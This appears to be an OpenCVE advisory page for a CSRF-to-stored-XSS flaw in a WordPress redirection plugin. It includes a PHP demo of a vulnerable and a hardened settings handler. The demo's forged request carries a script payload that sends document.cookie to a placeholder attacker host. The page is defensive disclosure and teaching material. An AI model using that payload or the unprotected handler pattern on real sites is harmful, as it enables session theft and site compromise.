Description
The Tm – WordPress Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.
Published: 2026-05-12
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The Tm‑WordPress Redirection plugin saves its settings without validating a WordPress nonce (the advisory does not name the specific function). An attacker who lures a logged‑in administrator into opening a crafted page or link can make the administrator's browser submit a forged settings update, riding on the admin's existing authenticated session. Because the submitted values are stored and later rendered without adequate sanitisation, the attacker can plant JavaScript that executes in the browser of whoever views the affected page, including the administrator, and from there issue further authenticated requests as that user. The root weakness is Cross‑Site Request Forgery (CWE‑352); the consequence is stored cross‑site scripting.
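The pattern described above, as an added example that is not code from the Tm – WordPress Redirection plugin or from Wordfence: an unprotected settings‑save handler next to a hardened one, driven by a constructed forged request. The function names `tm_save_settings_*`, the option name `tm_redirect_target` and the nonce action `tm_save_settings` are assumptions; the WordPress functions are replaced by minimal stand‑ins so the file runs under plain `php` from the command line.

```php
<?php
// Added example: not code from the Tm - WordPress Redirection plugin. It shows the
// unprotected settings-save pattern the CVE describes next to a hardened version,
// and drives both with a constructed forged request. The function names
// tm_save_settings_* and the option name tm_redirect_target are assumptions.
//
// Minimal stand-ins for the WordPress functions used below so the file runs with
// plain `php`; inside WordPress these come from core and must not be redefined.
$options = [];
$nonce_secret = 'demo-secret';   // WP derives nonces from wp_salt(), the user ID and session token
function wp_create_nonce($action) {
    global $nonce_secret;
    return substr(hash_hmac('md5', $action, $nonce_secret), -12, 10);
}
function wp_verify_nonce($nonce, $action) {
    return hash_equals(wp_create_nonce($action), (string) $nonce);
}
function current_user_can($cap) { return true; }                  // the victim is an administrator
function update_option($k, $v) { global $options; $options[$k] = $v; }
function get_option($k, $d = '') { global $options; return $options[$k] ?? $d; }
function sanitize_text_field($s) { return trim(strip_tags((string) $s)); }
function esc_attr($s) { return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8'); }
function esc_url_raw($u) {                                        // stand-in: accept http(s) URLs only
    return (filter_var($u, FILTER_VALIDATE_URL) && preg_match('#^https?://#i', $u)) ? $u : '';
}

// Vulnerable: request data goes straight into the option. No nonce, no capability
// check, no sanitisation. Any page the admin visits can submit this form.
function tm_save_settings_vulnerable(array $request) {
    if (!isset($request['tm_redirect_target'])) return false;
    update_option('tm_redirect_target', $request['tm_redirect_target']);
    return true;
}
function tm_render_setting_vulnerable() {                         // raw output: stored XSS sink
    return '<input name="tm_redirect_target" value="' . get_option('tm_redirect_target') . '">';
}

// Hardened: the request must carry a nonce bound to this action (a cross-site page
// cannot read it), the user must hold manage_options, and the value is sanitised.
function tm_save_settings_hardened(array $request) {
    if (!isset($request['tm_redirect_target'])) return false;
    if (!current_user_can('manage_options')) return false;
    if (!wp_verify_nonce($request['_wpnonce'] ?? '', 'tm_save_settings')) return false;
    $target = esc_url_raw(sanitize_text_field($request['tm_redirect_target']));
    if ($target === '') return false;
    update_option('tm_redirect_target', $target);
    return true;
}
function tm_render_setting_hardened() {                           // escape on output as well
    return '<input name="tm_redirect_target" value="' . esc_attr(get_option('tm_redirect_target')) . '">';
}

// Constructed forged request: the body an attacker-controlled page would auto-submit
// through the logged-in administrator's browser. It cannot include a valid nonce.
$forged = ['tm_redirect_target' => '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>'];

tm_save_settings_vulnerable($forged);
echo "vulnerable handler stored and renders:\n  ", tm_render_setting_vulnerable(), "\n";

$options = [];
echo "hardened handler, forged request accepted: ", var_export(tm_save_settings_hardened($forged), true), "\n";

// A legitimate save from the plugin's own settings page carries the nonce WP printed
// into the form with wp_nonce_field('tm_save_settings').
$legit = ['tm_redirect_target' => 'https://example.com/landing',
          '_wpnonce' => wp_create_nonce('tm_save_settings')];
echo "hardened handler, legitimate request accepted: ", var_export(tm_save_settings_hardened($legit), true), "\n";
echo "  ", tm_render_setting_hardened(), "\n";
```

The vulnerable handler accepts the forged body and renders the payload unescaped; the hardened handler rejects it because the nonce is missing, and accepts only the request that carries the nonce emitted into the plugin's own form. In a real plugin the equivalent checks are `check_admin_referer('tm_save_settings')` (which calls `wp_die()` on failure) in a custom handler, or registering the option with `register_setting()` and a `sanitize_callback` and emitting `settings_fields()` in the form, so that `options.php` performs the nonce and capability checks for you. The nonce check, the capability check and output escaping are independent controls; the CVE is what happens when the first is missing.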

Affected Systems

Any WordPress installation running the Tm‑WordPress Redirection plugin from vendor tienrocker with a version up to and including 1.2. No additional version ranges are specified beyond "up to 1.2".

Risk and Exploitability

The CVSS 3.1 base score is 6.1 (medium): network attack vector, low attack complexity, no privileges required, user interaction required, changed scope, low confidentiality and integrity impact, no availability impact (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). EPSS is below 1% (very low), the vulnerability is not listed in the CISA KEV catalog, and the SSVC record marks exploitation as "none" and the flaw as not automatable. The attacker needs no account on the site but must get an administrator to open a malicious link while logged in. The practical impact depends on what the injected script does once it runs in an administrator's browser: with that session it can submit further admin‑level requests, so full site compromise is plausible, although the advisory text itself establishes only settings tampering and script injection.

Generated by OpenCVE AI on May 12, 2026 at 10:41 UTC.

Remediation

No vendor fix or workaround is listed on this page at the time of writing.

OpenCVE Recommended Actions

  • Check the plugin's changelog for a release above 1.2 that adds nonce validation to the settings handler and upgrade to it; no fixed version is listed here yet.
  • If no fixed release is available, deactivate or remove the plugin so that the unprotected settings handler is not reachable; a disabled plugin's admin pages do not load.
  • Do not rely on IP allow‑listing or two‑factor authentication as a CSRF mitigation: the forged request is sent by the administrator's own browser, from their own network, over a session that has already passed authentication. Reduce exposure instead by limiting the number of administrator accounts, logging out of wp‑admin before browsing untrusted sites, and, where a WAF sits in front of the site, blocking settings‑update requests to the plugin that carry no nonce parameter.

Generated by OpenCVE AI on May 12, 2026 at 10:41 UTC.


Advisories

No advisories yet.

History

Tue, 12 May 2026 13:15:00 +0000

Metrics (ssvc) added:
{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Tue, 12 May 2026 08:30:00 +0000

Description added: The Tm – WordPress Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
Title added: Tm – WordPress Redirection <= 1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
Weaknesses added: CWE-352
References: (no values shown)
Metrics (cvssV3_1) added:
{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}



MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-05-12T12:55:54.202Z

Reserved: 2026-04-30T20:01:15.359Z

Link: CVE-2026-7561

Vulnrichment

Updated: 2026-05-12T12:54:15.642Z

NVD

Status : Deferred

Published: 2026-05-12T09:16:57.310

Modified: 2026-05-12T14:03:52.757

Link: CVE-2026-7561

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-12T10:45:14Z

Weaknesses